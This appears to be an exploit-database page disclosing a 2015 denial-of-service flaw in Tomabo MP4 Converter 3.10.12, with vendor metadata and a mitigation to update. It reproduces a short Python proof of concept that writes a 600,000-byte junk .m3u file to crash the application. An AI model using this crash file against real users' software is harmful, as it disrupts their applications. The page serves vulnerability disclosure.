header-logo
Suggest Exploit
vendor:
MP4 Converter
by:
M.Ibrahim
7,8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: MP4 Converter
Affected Version From: 3.10.12
Affected Version To: 3.10.12
Patch Exists: Yes
Related CWE: N/A
CPE: a:tomabo:mp4_converter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2015

Tomabo MP4 Converter 3.10.12 – (.m3u) Denial of service (Crush application)

Tomabo MP4 Converter 3.10.12 is vulnerable to a denial of service attack when a specially crafted .m3u file is opened. The application crashes when a 600000 bytes long string is written to the file.

Mitigation:

Update to the latest version of Tomabo MP4 Converter.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: Tomabo MP4 Converter 3.10.12 - (.m3u) Denial of service (Crush application)

# Date: [8-10-2015]
# Exploit Author: [M.Ibrahim]  vulnbug@gmail.com
# E-Mail:  vulnbug  <at>  gmail.com
# Vendor Homepage: http://www.tomabo.com/mp4-converter/index.html
# Version: [3.10.12] 
# Tested on: windows 7 x86


junk="A"*600000
file = "exploit.m3u"
f=open(file,"w")
f.write(junk);
f.close();

Navigation

Suggest Exploit

Services By CQR